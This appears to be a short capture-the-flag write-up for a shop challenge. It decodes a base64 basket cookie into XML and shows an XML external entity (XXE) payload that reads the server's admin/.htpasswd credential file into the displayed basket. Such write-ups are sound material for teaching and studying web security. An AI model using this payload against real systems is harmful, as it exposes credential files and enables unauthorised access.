Changes
* Could you break into his shop and get us as many items as you can?
* '''Goal : Access the admin page'''
== Solution ==
*The admin page is protected with http auth on /admin
*The shop items are saved in a cookie. Which decodes to an xml description of the basket, base64 and url encoded.
<pre>
In [11]: a='PD94bWwgdmVyc2lvbj0iMS4wIj8%2BCjxiYXNrZXQ%2BCiAgICA8aXRlbSB0eXBlPSI1IiBuYW1lPSJT%0Ad29yZCI%2BNTwvaXRlbT4KICAgIDxpdGVtIHR5cGU9IjQiIG5hbWU9IktuaWZlIj40PC9pdGVtPgo8%0AL2Jhc2tldD4KCg%3D%3D'
In [12]: print base64.decodestring(urllib2.unquote(a))
<?xml version="1.0"?>
<basket>
<item type="5" name="Sword">5</item>
<item type="4" name="Knife">4</item>
</basket>
</pre>
* We can then inject XML with the cookie, we use external entities which allow to manipulate local files and display the result in the XML
<pre>
<!DOCTYPE basket
[
<!ENTITY item SYSTEM "admin/.htpasswd">
]>
<basket>
<item type="5" name="asd">&item;</item>
</basket>
</pre>
* The result of the XML is parsed and displayed in the paying page, so we put the content of the .htpasswd file in an item element which will be displayed in the table.
